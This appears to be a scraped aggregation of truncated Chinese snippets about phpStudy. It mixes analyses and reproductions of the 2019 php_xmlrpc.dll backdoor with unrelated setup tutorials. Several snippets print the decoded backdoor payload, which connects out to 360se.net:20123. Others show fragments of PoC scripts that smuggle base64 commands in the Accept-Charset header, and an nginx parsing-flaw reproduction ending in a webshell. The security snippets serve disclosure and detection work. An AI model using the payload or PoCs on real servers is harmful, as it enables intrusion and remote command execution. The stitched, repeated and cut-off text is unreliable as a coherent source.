还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。...经过提取,该payload为: @ini_set("display_errors","0"); error_reporting(0); function tcpGet($sendMsg = '', $ip...= '360se.net', $port = '20123'){ $result = ""; $handle = stream_socket_client("tcp://{$ip}:{$port...$handle ){ $handle = fsockopen($ip, intval($port), $errno, $errstr, 5); if( !...2019/09/24攻击总数13320,攻击IP数110,被攻击网站数6570,以下是攻击来源TOP 20: 攻击来源 攻击次数 *.164.246.149 2251 *.114.106.254 1829
复现环境 phpstudy2016 +win10 复现过程 启动有漏洞的phpstudy pcat的检测脚本如下 python版本: # -*- coding:utf8 -*- __author__='...dirs: pcheck(os.path.join(path, name)) pass if __name__ == '__main__': foo() 放在phpstudy...5.4.45\ext\php_xmlrpc.dll === @eval(%s('%s')); %s;@eval(%s('%s')); [Finished in 10.2s] 可以发现 主要是这两个版本的phpstudy...这个是要执行的命令base64 编码 网上随便找了个检测的脚本: # -*-coding:utf-8 -*- import requests import sys import base64 def Poc(ip...": "gzip,deflate", "Accept-Charset": pay, "Upgrade-Insecure-Requests": "1", } url = ip
还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。 2....经过提取,该payload为: @ini_set("display_errors","0"); error_reporting(0); function tcpGet($sendMsg = '', $ip...= '360se.net', $port = '20123'){ $result = ""; $handle = stream_socket_client("tcp://{$ip}:{$port...$handle ){ $handle = fsockopen($ip, intval($port), $errno, $errstr, 5); if( !...2019/09/24攻击总数13320,攻击IP数110,被攻击网站数6570,以下是攻击来源TOP 20: 攻击来源 攻击次数 *.164.246.149 2251 *.114.106.254 1829
0x01:前言 近日,phpStudy被公告疑似遭遇黑客攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门,经网友确认phpStudy2016、phpStudy2018的部分版本有后门...0x02:预防 phpStudy启动时默认加载php-5.4.45版本的PHP,该版本存在后门,可以从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll...影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45...更多漏洞细节参考文章:PHPStudy后门事件分析 0x02 环境准备 本次漏洞复现的演示靶场为phpStudy 2018中的php-5.2.17+Apache环境 phpStudy 2018 后门版...:点击下载 提取码:nlnq 靶机环境搭建成功后,即可访问phpinfo页面 0x03 漏洞检测 phpStudy的后门问题代码存在于以下路径文件中 # phpStudy2016路径 php\php...BurpSuite-Extender-phpStudy-Backdoor-Scanner:点击下载 插件安装成功后,在每次抓包时就会自动的扫描分析漏洞是否存在,若存在漏洞,则会提示相应的告警信息。
---- 下载和安装 先wget下载 wget -c http://lamp.phpstudy.net/phpstudy.bin 再给对应的权限(自己服务器,暂时自己用,所以暂时744权限) chmod...744 phpstudy.bin (文档上是 chmod +x phpstudy.bin, 自己简单操作) 最后安装 ....这个时候 访问对应的ip 或者 网址, 可以看见对应的环境说明 包括对应的参数 ? ? ---- 假如你先安装的apache+php5.5 想切换成nginx+php5.4 你就再走一次..../phpstudy.bin 但是你会发现有一行是否安装mysql提示 选不安装 这样只需要编译nginx+php5.4 【phpstudy还是蒲老师很早介绍的, 应该有快2年了,感谢:)】 ---...卸载phpstudy的方法 ? 重启 ? vhost添加 ? vhost删除 ?
问题概要 有问题的版本如下 phpStudy20180211版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dll phpStudy20161103版本 php5.4.45...环境准备 本次使用的是之前下载安装在本地的phpStudy20180211官网版本 官网下载地址 phpStudy 2018版本下载及更新日志 - phpStudy交流社区 https://www.xp.cn...); } base解码如下: @ini_set("display_errors","0"); error_reporting(0); function tcpGet($sendMsg = '', $ip...= '360se.net', $port = '20123'){ $result = ""; $handle = stream_socket_client("tcp://{$ip}:{$port...$handle ){ $handle = fsockopen($ip, intval($port), $errno, $errstr, 5); if( !
作者:lu4nx@知道创宇404积极防御实验室 作者博客:《使用 Ghidra 分析 phpStudy 后门》 原文链接:https://paper.seebug.org/1058/ 这次事件已过去数日...7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中。...= '360se.net', $port = '20123'){ $result = ""; $handle = stream_socket_client("tcp://{$ip}...$handle ){ $handle = fsockopen($ip, intval($port), $errno, $errstr, 5); if( !...《phpStudy 遭黑客入侵植入后门事件披露 | 微步在线报告》 《PhpStudy 后门分析》,作者:Hcamael@知道创宇 404 实验室
打开站点域名管理 填写站点管理内容,然后点击新增,左侧会增加更才填写的内容,然后点击保存设置并生产配置文件 修改hosts本地映射 Paste_Image.pn...
0x01 漏洞简介 自从2019年phpStudy爆出后门事件后,2020年9月再次爆出存在nginx解析漏洞。该漏洞是phpStudy默认使用的nginx版本是Nginx1.15.11。...影响版本: phpStudy <= 8.1.0.7 (Windows版) 0x02 漏洞原因 1、由于用户的错误配置导致 nginx 把以 .php 结尾的文件交给 fastcgi 处理,为此可以构造...0x03 环境准备 本次复现环境采用Windows版的phpstudy v8.1.0.1 phpstudy v8.1.0.1 点击下载 提取码:y6qt 安装成功后一键启动WNMP即可 0x04 漏洞复现...构造解析后缀访问如下: http://192.168.126.129/3.jpg/xxx.php 在图片马中写入shell,以冰蝎码为例 然后使用冰蝎管理工具进行连接即可 0x05 修复建议 建议升级phpStudy
下载phpStudy 2016以及DVWA靶场 phpStudy 2016 官方下载地址: https://www.xp.cn/download.html 下载DVWA靶场 我目前就找到了一个下载地址...=gqj1 安装DVWA靶场: GitHub有一个中文详细安装说明:https://github.com/digininja/DVWA/blob/master/README.zh.md 打开 PhpStudy...到DVWA的目录下找到 config.inc.php.dist 文件将后缀去掉改成 config.inc.php 打开 config.inc.php 文件修改里面的内容 如实际情况修改数据连接信息等,PhpStudy
背景 因为注意到,使用 phpStudy 进行环境搭建时,有时需要使用 composer 每次都需要查找资料进行配置, 在此进行记录笔记,方便有需要的道友借鉴 配置 版本:composer1.8.5...(phpStudy8 当前只能安装这一个版本) 系统:windows10 操作步骤 1.
首先,确保你的apache编译了ssl模块,这是支持ssl证书必要的条件(如果没有,请编译,打开phpstudy——设置——PHP模块扩展——php-openssl前面勾选上)。...第二,找到配置80端口http的网站配置的地方,一般在如下路径:D:\phpStudy\Apache\conf有一个vhosts.conf的文件,按照80的配置,另起一个VirtualHost443,如下所示...yourdomain.com #(和80一样) Errorlog /logs #(和80一样) DocumentRoot “D:\phpStudy
下载phpStudy 2016以及pikachu靶场 pikachu靶场GitHub下载地址: https://github.com/zhuifengshaonianhanlu/pikachu phpStudy...2016 官方下载地址: https://www.xp.cn/download.html 安装pikachu 将下载好的pikachu文件放到 phpStudy\WWW 目录下,并解压...pikachu-master文件夹重命名为 pikachu 进入 pikachu 目录中再进入 \inc 目录下修改 文件config.inc.php文件,修改填写MySQL数据库密码账号(默认没动过phpStudy...安装的mysql数据库默认密码账号 root)如下图操作 启动phpStudy(默认端口是 80)在浏览器访问页面,如果你是本地安装地址为:127.0.0.1/pikachu ,如果你是虚拟机安装就虚拟机...ip/pikachu 你可以点击进入首页点击漏洞查看是否正常使用,到此安装完成
最近项目需求需要用到mongodb数据库,网上搜了一堆,结果不是复制安装mododb的解说成mongo的,就是安装mongo的说成是mongodb的, 一.phpstudy扩展mongoDB的前提 记得先安装...PHPstudy 最好去官网上下载的PHPstudy版本 ?...运行PHPstudy,先点击停止,点击切换版本,把PHP版本切换到5.5及以上的版本,本文采用5.6的版本,PHP版本越高,相对的漏洞越少,相对越稳定 ?...在PHPstudy中其他菜单选项–>打开配置文件–>php-ini 在里面添加 extension=php_mongo.dll extension=php_mongodb.dll ?...五.点击PHPstudy的重启,刷新PHPinfo页面,搜索mongo和mogodb ? ? 出现上图,就证明phpstudy扩展mongodb大功告成
image.png 安装 安装方法(phpstudy for linux V0.2公测版) 使用 SSH 连接工具 连接到您的 Linux服务器后,根据系统执行相应命令开始安装(大约2分钟完成面板安装
7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中。...= '360se.net', $port = '20123'){ $result = ""; $handle = stream_socket_client("tcp://{$ip}...$handle ){ $handle = fsockopen($ip, intval($port), $errno, $errstr, 5); if( !...%E5%90%8E%E9%97%A8.html [2] https://github.com/jas502n/PHPStudy-Backdoor [3] 《phpStudy 遭黑客入侵植入后门事件披露...| 微步在线报告》 [4] 《PhpStudy 后门分析》作者:Hcamael@知道创宇 404 实验室
phpstudy是一款php一键环境的安装包,里面包含了多版本的php,可以随意切换php版本等 下面是多站点的配置教程 安装并运行phpstudy 点击其他选项菜单 ? 点击站点域名管理 ?...这个是用于配置本地虚拟域名,host可以屏蔽域名并把域名指向设定的ip,比如我设定腾讯的域名指向百度的ip,那么这台电脑输入qq.com会转向百度的网站 ?
www.cnblogs.com/-qing-/ import base64 import requests import threading import queue print("======Phpstudy...www.cnblogs.com/-qing-/ import base64 import requests import threading import threadpool print("======Phpstudy...www.cnblogs.com/-qing-/ import base64 import requests import threading import threadpool import re print("======Phpstudy
漏洞第一时间了解 点击蓝字 · 关注我们 01 前言 phpstudy(小皮模板存在nginx解析漏洞[phpstudy莫名的就背锅了) 影响版本 phptsuy8.1.07的Nginx1.5.11...版本 02 简介 phpstudy(小皮面板) 简介: phpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。...03 漏洞复现 0x01 测试环境: Winodws server 2012 Phpstudy(小皮版本) 8.1.0.7 Nginx 1.15.11 Php 7.3.4 ?...nginx把以'.php'结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是'.php',任何服务器端不存在的php...首先这个洞属于nginx解析漏洞,其实很早之前就已经有了,只不过phpstudy nginx环境 使用了较低的nginx版本,所以存在漏洞. 3.这个洞只有PHPSTUDY有吗?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
实时音视频
